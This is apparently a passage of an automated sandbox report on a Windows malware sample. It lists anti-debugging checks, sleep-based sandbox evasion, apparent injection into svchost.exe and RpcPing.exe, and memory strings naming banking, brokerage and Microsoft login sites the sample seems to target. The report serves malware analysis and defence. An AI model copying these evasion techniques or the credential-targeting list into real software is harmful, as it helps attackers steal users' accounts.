            Source: C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe TID: 5232Thread sleep time: -52500s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe TID: 5232Thread sleep count: 38 > 30Jump to behavior
            Source: C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe TID: 5232Thread sleep time: -38000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\RpcPing.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\N2Qncau2rN.exeCode function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452492
            Source: C:\Users\user\Desktop\N2Qncau2rN.exeCode function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442886
            Source: C:\Users\user\Desktop\N2Qncau2rN.exeCode function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_004788BD
            Source: C:\Users\user\Desktop\N2Qncau2rN.exeCode function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,0_2_004339B6
            Source: C:\Users\user\Desktop\N2Qncau2rN.exeCode function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,0_2_0045CAFA
            Source: C:\Users\user\Desktop\N2Qncau2rN.exeCode function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00431A86
            Source: C:\Users\user\Desktop\N2Qncau2rN.exeCode function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD27
            Source: C:\Users\user\Desktop\N2Qncau2rN.exeCode function: 0_2_0045DE8F FindFirstFileW,FindClose,0_2_0045DE8F
            Source: C:\Users\user\Desktop\N2Qncau2rN.exeCode function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8B
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_0048C4E0 FindFirstFileW,FindNextFileW,FindClose,5_2_0048C4E0
            Source: C:\Users\user\Desktop\N2Qncau2rN.exeCode function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,0_2_0040E500
            Source: 0J030901P.5.drBinary or memory string: dev.azure.comVMware20,11696497155j
            Source: 0J030901P.5.drBinary or memory string: global block list test formVMware20,11696497155
            Source: 0J030901P.5.drBinary or memory string: turbotax.intuit.comVMware20,11696497155t
            Source: 0J030901P.5.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
            Source: 0J030901P.5.drBinary or memory string: Interactive Brokers - HKVMware20,11696497155]
            Source: RpcPing.exe, 00000005.00000002.4127083272.00000000027C2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlll
            Source: 0J030901P.5.drBinary or memory string: secure.bankofamerica.comVMware20,11696497155|UE
            Source: 0J030901P.5.drBinary or memory string: tasks.office.comVMware20,11696497155o
            Source: 0J030901P.5.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696497155
            Source: 0J030901P.5.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
            Source: firefox.exe, 0000000A.00000002.2187338395.000002494D56C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: 0J030901P.5.drBinary or memory string: bankofamerica.comVMware20,11696497155x
            Source: 0J030901P.5.drBinary or memory string: ms.portal.azure.comVMware20,11696497155
            Source: 0J030901P.5.drBinary or memory string: trackpan.utiitsl.comVMware20,11696497155h
            Source: 0J030901P.5.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
            Source: 0J030901P.5.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
            Source: 0J030901P.5.drBinary or memory string: interactivebrokers.co.inVMware20,11696497155d
            Source: 0J030901P.5.drBinary or memory string: Canara Transaction PasswordVMware20,11696497155x
            Source: 0J030901P.5.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696497155
            Source: 0J030901P.5.drBinary or memory string: interactivebrokers.comVMware20,11696497155
            Source: 0J030901P.5.drBinary or memory string: AMC password management pageVMware20,11696497155
            Source: auuGcaPMTDojV.exe, 00000008.00000002.4128187039.0000000000B7F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllr
            Source: 0J030901P.5.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
            Source: 0J030901P.5.drBinary or memory string: Canara Transaction PasswordVMware20,11696497155}
            Source: 0J030901P.5.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
            Source: 0J030901P.5.drBinary or memory string: account.microsoft.com/profileVMware20,11696497155u
            Source: 0J030901P.5.drBinary or memory string: discord.comVMware20,11696497155f
            Source: 0J030901P.5.drBinary or memory string: netportal.hdfcbank.comVMware20,11696497155
            Source: 0J030901P.5.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
            Source: 0J030901P.5.drBinary or memory string: outlook.office365.comVMware20,11696497155t
            Source: 0J030901P.5.drBinary or memory string: outlook.office.comVMware20,11696497155s
            Source: 0J030901P.5.drBinary or memory string: www.interactivebrokers.comVMware20,11696497155}
            Source: 0J030901P.5.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
            Source: 0J030901P.5.drBinary or memory string: microsoft.visualstudio.comVMware20,11696497155x
            Source: C:\Users\user\Desktop\N2Qncau2rN.exeAPI call chain: ExitProcess graph end nodegraph_0-86723
            Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0347096E rdtsc 2_2_0347096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004175D3 LdrLoadDll,2_2_004175D3
            Source: C:\Users\user\Desktop\N2Qncau2rN.exeCode function: 0_2_0045A370 BlockInput,0_2_0045A370
            Source: C:\Users\user\Desktop\N2Qncau2rN.exeCode function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D590
            Source: C:\Users\user\Desktop\N2Qncau2rN.exeCode function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress,0_2_0040EBD0
            Source: C:\Users\user\Desktop\N2Qncau2rN.exeCode function: 0_2_040DF4B0 mov eax, dword ptr fs:[00000030h]0_2_040DF4B0
            Source: C:\Users\user\Desktop\N2Qncau2rN.exeCode function: 0_2_040DF510 mov eax, dword ptr fs:[00000030h]0_2_040DF510
            Source: C:\Users\user\Desktop\N2Qncau2rN.exeCode function: 0_2_040DDEB0 mov eax, dword ptr fs:[00000030h]0_2_040DDEB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B035C mov eax, dword ptr fs:[00000030h]2_2_034B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B035C mov eax, dword ptr fs:[00000030h]2_2_034B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B035C mov eax, dword ptr fs:[00000030h]2_2_034B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B035C mov ecx, dword ptr fs:[00000030h]2_2_034B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B035C mov eax, dword ptr fs:[00000030h]2_2_034B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B035C mov eax, dword ptr fs:[00000030h]2_2_034B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FA352 mov eax, dword ptr fs:[00000030h]2_2_034FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D8350 mov ecx, dword ptr fs:[00000030h]2_2_034D8350
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D437C mov eax, dword ptr fs:[00000030h]2_2_034D437C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346A30B mov eax, dword ptr fs:[00000030h]2_2_0346A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346A30B mov eax, dword ptr fs:[00000030h]2_2_0346A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346A30B mov eax, dword ptr fs:[00000030h]2_2_0346A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342C310 mov ecx, dword ptr fs:[00000030h]2_2_0342C310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03450310 mov ecx, dword ptr fs:[00000030h]2_2_03450310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034EC3CD mov eax, dword ptr fs:[00000030h]2_2_034EC3CD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A3C0 mov eax, dword ptr fs:[00000030h]2_2_0343A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A3C0 mov eax, dword ptr fs:[00000030h]2_2_0343A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A3C0 mov eax, dword ptr fs:[00000030h]2_2_0343A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A3C0 mov eax, dword ptr fs:[00000030h]2_2_0343A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A3C0 mov eax, dword ptr fs:[00000030h]2_2_0343A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A3C0 mov eax, dword ptr fs:[00000030h]2_2_0343A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034383C0 mov eax, dword ptr fs:[00000030h]2_2_034383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034383C0 mov eax, dword ptr fs:[00000030h]2_2_034383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034383C0 mov eax, dword ptr fs:[00000030h]2_2_034383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034383C0 mov eax, dword ptr fs:[00000030h]2_2_034383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B63C0 mov eax, dword ptr fs:[00000030h]2_2_034B63C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE3DB mov eax, dword ptr fs:[00000030h]2_2_034DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE3DB mov eax, dword ptr fs:[00000030h]2_2_034DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE3DB mov ecx, dword ptr fs:[00000030h]2_2_034DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE3DB mov eax, dword ptr fs:[00000030h]2_2_034DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D43D4 mov eax, dword ptr fs:[00000030h]2_2_034D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D43D4 mov eax, dword ptr fs:[00000030h]2_2_034D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]2_2_034403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]2_2_034403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]2_2_034403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]2_2_034403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]2_2_034403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]2_2_034403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]2_2_034403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]2_2_034403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344E3F0 mov eax, dword ptr fs:[00000030h]2_2_0344E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344E3F0 mov eax, dword ptr fs:[00000030h]2_2_0344E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344E3F0 mov eax, dword ptr fs:[00000030h]2_2_0344E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034663FF mov eax, dword ptr fs:[00000030h]2_2_034663FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342E388 mov eax, dword ptr fs:[00000030h]2_2_0342E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342E388 mov eax, dword ptr fs:[00000030h]2_2_0342E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342E388 mov eax, dword ptr fs:[00000030h]2_2_0342E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345438F mov eax, dword ptr fs:[00000030h]2_2_0345438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345438F mov eax, dword ptr fs:[00000030h]2_2_0345438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03428397 mov eax, dword ptr fs:[00000030h]2_2_03428397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03428397 mov eax, dword ptr fs:[00000030h]2_2_03428397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03428397 mov eax, dword ptr fs:[00000030h]2_2_03428397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B8243 mov eax, dword ptr fs:[00000030h]2_2_034B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B8243 mov ecx, dword ptr fs:[00000030h]2_2_034B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342A250 mov eax, dword ptr fs:[00000030h]2_2_0342A250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03436259 mov eax, dword ptr fs:[00000030h]2_2_03436259
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034EA250 mov eax, dword ptr fs:[00000030h]2_2_034EA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034EA250 mov eax, dword ptr fs:[00000030h]2_2_034EA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03434260 mov eax, dword ptr fs:[00000030h]2_2_03434260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03434260 mov eax, dword ptr fs:[00000030h]2_2_03434260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03434260 mov eax, dword ptr fs:[00000030h]2_2_03434260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342826B mov eax, dword ptr fs:[00000030h]2_2_0342826B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342823B mov eax, dword ptr fs:[00000030h]2_2_0342823B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A2C3 mov eax, dword ptr fs:[00000030h]2_2_0343A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A2C3 mov eax, dword ptr fs:[00000030h]2_2_0343A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A2C3 mov eax, dword ptr fs:[00000030h]2_2_0343A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A2C3 mov eax, dword ptr fs:[00000030h]2_2_0343A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A2C3 mov eax, dword ptr fs:[00000030h]2_2_0343A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034402E1 mov eax, dword ptr fs:[00000030h]2_2_034402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034402E1 mov eax, dword ptr fs:[00000030h]2_2_034402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034402E1 mov eax, dword ptr fs:[00000030h]2_2_034402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E284 mov eax, dword ptr fs:[00000030h]2_2_0346E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E284 mov eax, dword ptr fs:[00000030h]2_2_0346E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B0283 mov eax, dword ptr fs:[00000030h]2_2_034B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B0283 mov eax, dword ptr fs:[00000030h]2_2_034B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B0283 mov eax, dword ptr fs:[00000030h]2_2_034B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034402A0 mov eax, dword ptr fs:[00000030h]2_2_034402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034402A0 mov eax, dword ptr fs:[00000030h]2_2_034402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C62A0 mov eax, dword ptr fs:[00000030h]2_2_034C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C62A0 mov ecx, dword ptr fs:[00000030h]2_2_034C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C62A0 mov eax, dword ptr fs:[00000030h]2_2_034C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C62A0 mov eax, dword ptr fs:[00000030h]2_2_034C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C62A0 mov eax, dword ptr fs:[00000030h]2_2_034C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C62A0 mov eax, dword ptr fs:[00000030h]2_2_034C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C4144 mov eax, dword ptr fs:[00000030h]2_2_034C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C4144 mov eax, dword ptr fs:[00000030h]2_2_034C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C4144 mov ecx, dword ptr fs:[00000030h]2_2_034C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C4144 mov eax, dword ptr fs:[00000030h]2_2_034C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C4144 mov eax, dword ptr fs:[00000030h]2_2_034C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342C156 mov eax, dword ptr fs:[00000030h]2_2_0342C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C8158 mov eax, dword ptr fs:[00000030h]2_2_034C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03436154 mov eax, dword ptr fs:[00000030h]2_2_03436154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03436154 mov eax, dword ptr fs:[00000030h]2_2_03436154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE10E mov eax, dword ptr fs:[00000030h]2_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE10E mov ecx, dword ptr fs:[00000030h]2_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE10E mov eax, dword ptr fs:[00000030h]2_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE10E mov eax, dword ptr fs:[00000030h]2_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE10E mov ecx, dword ptr fs:[00000030h]2_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE10E mov eax, dword ptr fs:[00000030h]2_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE10E mov eax, dword ptr fs:[00000030h]2_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE10E mov ecx, dword ptr fs:[00000030h]2_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE10E mov eax, dword ptr fs:[00000030h]2_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE10E mov ecx, dword ptr fs:[00000030h]2_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DA118 mov ecx, dword ptr fs:[00000030h]2_2_034DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DA118 mov eax, dword ptr fs:[00000030h]2_2_034DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DA118 mov eax, dword ptr fs:[00000030h]2_2_034DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DA118 mov eax, dword ptr fs:[00000030h]2_2_034DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F0115 mov eax, dword ptr fs:[00000030h]2_2_034F0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03460124 mov eax, dword ptr fs:[00000030h]2_2_03460124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F61C3 mov eax, dword ptr fs:[00000030h]2_2_034F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F61C3 mov eax, dword ptr fs:[00000030h]2_2_034F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE1D0 mov eax, dword ptr fs:[00000030h]2_2_034AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE1D0 mov eax, dword ptr fs:[00000030h]2_2_034AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE1D0 mov ecx, dword ptr fs:[00000030h]2_2_034AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE1D0 mov eax, dword ptr fs:[00000030h]2_2_034AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE1D0 mov eax, dword ptr fs:[00000030h]2_2_034AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035061E5 mov eax, dword ptr fs:[00000030h]2_2_035061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034601F8 mov eax, dword ptr fs:[00000030h]2_2_034601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03470185 mov eax, dword ptr fs:[00000030h]2_2_03470185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034EC188 mov eax, dword ptr fs:[00000030h]2_2_034EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034EC188 mov eax, dword ptr fs:[00000030h]2_2_034EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D4180 mov eax, dword ptr fs:[00000030h]2_2_034D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D4180 mov eax, dword ptr fs:[00000030h]2_2_034D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B019F mov eax, dword ptr fs:[00000030h]2_2_034B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B019F mov eax, dword ptr fs:[00000030h]2_2_034B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B019F mov eax, dword ptr fs:[00000030h]2_2_034B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B019F mov eax, dword ptr fs:[00000030h]2_2_034B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342A197 mov eax, dword ptr fs:[00000030h]2_2_0342A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342A197 mov eax, dword ptr fs:[00000030h]2_2_0342A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342A197 mov eax, dword ptr fs:[00000030h]2_2_0342A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03432050 mov eax, dword ptr fs:[00000030h]2_2_03432050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B6050 mov eax, dword ptr fs:[00000030h]2_2_034B6050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345C073 mov eax, dword ptr fs:[00000030h]2_2_0345C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B4000 mov ecx, dword ptr fs:[00000030h]2_2_034B4000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]2_2_034D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]2_2_034D2000
